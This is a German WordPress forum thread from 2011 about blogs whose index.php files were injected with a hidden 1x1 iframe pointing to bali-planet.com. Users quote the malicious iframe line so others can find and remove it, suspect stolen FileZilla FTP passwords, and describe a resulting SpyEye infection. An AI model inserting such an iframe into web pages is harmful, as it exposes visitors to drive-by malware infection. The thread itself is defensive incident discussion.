MALWARE Angriff auf WordPress-Blogs - Aktuell

  • Editiert:


    Überprüft bitte (eventuell und wenn ihr mal zeit habt oder eure seite vom provider gesperrt wurde) Eure Blogs und dort bitte unbedingt (muss aber nicht) [COLOR=Red]alle [/COLOR]Index.php-Dateien - in Themes und Plugins usw. auf folgende Codezeile und löscht diese.

    [COLOR=Red]

    PHP
    Example of malware script: <iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe>

    [/COLOR]

    Vor dem Code steht manchmal noch // Silence is golden oder ähnlicher Mist.


    Es schreibt sich in fast alle index-Dateien. Mir sind gerade 12 (editiert: 21) Blogs ausgestiegen. Derzeitg betroffen Server von One.com, easyhost, alphahosting).

    Ein Hacker oder der Wurm dessen scheint sich an WordPress-Blogs austoben zu wollen.
    ( Editiert: Muss aber nicht sein. Kann auch Eure Schuld sein. Vielleicht seid Ihr nur schlechte Programmierer. Wer weiß das schon? )

    Dringend Backup machen via FTP.
    Dann alle Dateien überprüfen und bei Bedarf wieder aufspielen.
    (Editiert: auch die auf dem Rechner vorhandenen Dateien überprüfen. Tipps für gute Anti-Malware-Programme gibts in diesem Thread.)

    Einmal editiert, zuletzt von NeuerUSER (25. Januar 2011 um 19:21)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Die neueste und die davor auf einigen Blogs. Bei der Menge, schaffe ich die Updates nie rechtzeitig bei der Updatefähigkeit von WordPress.

    "//Silence ist golden" gehört aber nicht in die Themes, die ich verwende. Ich habe auch diesen Eintrag an anderen Stellen gefunden, wo der Bali-Link noch nicht drin war. Keine Ahnung wo es herkommt. Vielleicht versucht der Bot erst das zu schreiben und knallt den Bali-Link hinterher.

  • in meinen plugins verwende ich aber auch //silence is gold
    also steckt der code in den templates, oder wo genau überall?
    denk dran dass die templates auch ein sicherheitsrisiko darstellen können

  • Ja, ist bekannt.

    Ich habe den Supportchat mit dem Provider nicht gespeichert. Aber beispielsweise steckte der Link, der dann vom Provider als MALWARE erkannt wurde auch in:

    installiertes Standardtheme Twentyten index.php

    installiertes Plugin Realy Simple Captchar (Wichtig für ContactForm 7) und zwar dort in der index.php im TMP-Ordner

    in der index.php des wp-Optimize und in der Index.php des Plugins
    wp-mobil (oder so ähnlich - Es zeigt den Blog für Smarthphonebenuzter in einer mobilen Version an)

    Soweit krieg ich's noch zusammen.
    Wenn mir noch was einfällt, melde ich mich.

    Ah. Doch gespeichert. Als Mail. Also:
    index.php in
    wp-admin /
    wp-content /
    wp-content/themes
    wp-content/themes/twentyten/
    und weitere
    etc.

    sateffen
    Sicher steckt der Code in den Themes und Plugins. Nur wie kommt er da rein? Besonders in meinen eigenenen Themes ist sowas nicht drin.
    Das passiert nicht auf 21 Blogs gleichzeitig, von denen jetzt 16 suspendiert sind.

    Update:
    Das Standardtheme twentyten wird von mir nicht benutzt, ist aber für Umbauarbeiten auf dem Hoster installiert. Falls mal was schief geht.
    Kurios, dass es auch da drin ist.

    Einmal editiert, zuletzt von NeuerUSER (25. Januar 2011 um 17:55)

  • my blogs are all clean. sone überprüfung dauert ja keine 3min.
    ich hab die seite mal durchscannen lassen, keine malware/viren aktivitäten.
    wird als unpopuläre nutzlose seite eingestuft vom scanner^^

  • Ich halte von dieser Panik verbreitenden Überschrift gar nichts. Genauso wenig von solchen Phrasen wie "Überprüft bitte Eure Blogs und dort bitte unbedingt alle Index.php-Dateien". Jeder neue User der hier her kommt, macht sich vermutlich vor Angst erstmal ins Höschen und bekommt gleich einen negativen Eindruck von WordPress.

    Meist ist es die Unachtsamkeit der User, die einen solchen Angriff ermöglicht. Themes über Google suchen und nicht genau in den Code schauen, 50 aktive/inaktive Plugins, irgendwelche JS-Spielereien die im Netz gefunden werden etc. können ein Grund dafür sein. Ebenso ist es nicht auszuschließen, dass andere Systeme die ebenfalls auf dem Server betrieben werden dem Angreifer Einlass gewähren. Ganz zu schweigen von unsicheren Zugangsdaten für FTP, MySQL oder WP sowie falschen Dateirechten. Es ist auch nicht ungewöhnlich, dass sich der Code in so ziemlich jeder index.php oder JS Datei auf dem Server breit macht.

    Vielleicht könnte man den Titel mal editieren.

    Einmal editiert, zuletzt von mfitzen (25. Januar 2011 um 19:12)

  • Ganz ernsthaft jetzt:

    a) Danke für den Anti-Malware-Tipp.

    b) Teilweise sind es meine eigenen Scripte und da ist das definitiv nicht drin. Punkt und aus. Ich schreibe alle Scripte zeile für zeile von hand.

    c) Ich hab fast darauf gewartet, dass man von "Panikmache" spricht oder der Post kaputt gemacht wird. Ist fast in jedem Forum so. Ob Automarke oder Blogging-System. Besonders von Usern mit hohem PostRank. Auch wenn Ihr davon viel Ahnung hat

    Sorry, dass ich darauf hingewiesen habe. Eine softere Überschrift könnte dazu führen, dass es nicht gelesen wird.
    Ach ist mir doch egal.

    Tja, dann war's das wieder mit dem Forum.
    Ich stells in meinen Blog für die SERPS. :-)
    Bye.

    PS: Ich find den Punkt nicht, wo ich die Überschrift verharmlosen kann. Den Punkt zum Account-Löschen finde ich auch nicht auf die Fixe. Vielleicht ist ja ein Mod so nett, dann hat die liebe Seele wieder ruh.
    SeeYa

    Einmal editiert, zuletzt von NeuerUSER (25. Januar 2011 um 19:22)

  • Sorry, aber es war lediglich ein Versuch andere (neue und unerfahrene) User davor zu bewahren gleich in Panik zu verfallen und alle Sicherheitsaspekte in Frage zu stellen.

    Auf das Problem hinzuweisen ist ja vollkommen in Ordnung, da bin ich voll bei Dir. Und vielleicht gibt es auch eine aktuelle Sicherheitslücke in WP aber der Titel und der erste Satz Deines Beitrags haben in meinem Augen "Bildzeitungsniveau".

    Unabhängig von der Anzahl meiner Beiträge: Ich versuche hier jedem nach bestem Wissen und Gewissen zu helfen und bin weit davon weg irgendwelche Threads kaputt zu machen.

    So, ich mach mich dann mal aus dem Staub. Ist eigentlich auch nicht meine Art so zu antworten, dass User sich gleich angegriffen fühlen. Vermutlich war ich gerade nur zur falschen Zeit im falschen Thread unterwegs...

    Einmal editiert, zuletzt von mfitzen (25. Januar 2011 um 19:51)

  • Ich hatte das gleiche Problem

    Hallo, genau das gleiche Problem hatte ich auch. Bei mir war auch der Bali Code auf all meinen Internetseiten. Und das schöne daran ist es liegt NICHT an wordpress.

    Wer das selbe Malware-Code snippet hat, sollte mal in seine FTP-Log Files reinsehen. Der Code kommt nicht per HTTP Zugriff, sondern direkt per FTP Zugriff auf den Server.
    Die Angriffe kamen bei mir über einen Provider aus Rom.

    Ich bin mir mittlerweile zu 99,5% sicher, dass die FielZilla Passwort-Datei geklaut wurde. Jedenfall waren die Passwörter nur dort gespeichert und mussten allesamt geändert werden.

    Um zu verhindern, dass die Seiten bei Google auf dem Index landen, sollte man folgendes tun:
    - Mit einer .htacess Datei die Ganze Internetseite sperren
    - Wichtig: FTP Passwort ändern und nicht im FTP-Programm eingeben
    - Malware Code aus den index.html/php start.html/php home.php/html Dateien entfernen
    - htacces Datei löschen

    Mich würde mehr als nur brennend interessieren, wo sich der Wurm/Trojaner/böses Script versteckt, dass für den Passwortklau verantwortlich ist.

    Einmal editiert, zuletzt von p4771 (26. Januar 2011 um 17:01)

  • Spyeye Virus über bali-planet.com

    Moin aus Hamburg!

    Kann nur warnen. Bei mir exakt gleiche Konstellation!

    Datenklau der FTP-Zugangsdaten von Filezilla und Abänderung aller
    index-Dateien mit iframe im Body-Tag.

    Ruft man die veränderte Seite auf, installiert sich der Spyeye-Virus
    als portwexexe.exe und legt ein gleichlautendes Verzeichnis an.

    Weitere Veränderungen sind massiv. Sowohl die Registry als auch
    Systemdateien werden verändert, die Systemwiederherstellung gekickt.

    Sitze seit 2 Tagen an der Back-Up-Aufspielung und am PC Cleaning.

    In vielen Foren wird empfohlen ein format c: zu machen, es gibt aber
    gute Anleitungen die Dateien zu löschen, das System wieder herzustellen
    und die Registry zu bereinigen -> Malwarebytes ist sicher ein Mittel der Wahl. Good Luck!

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!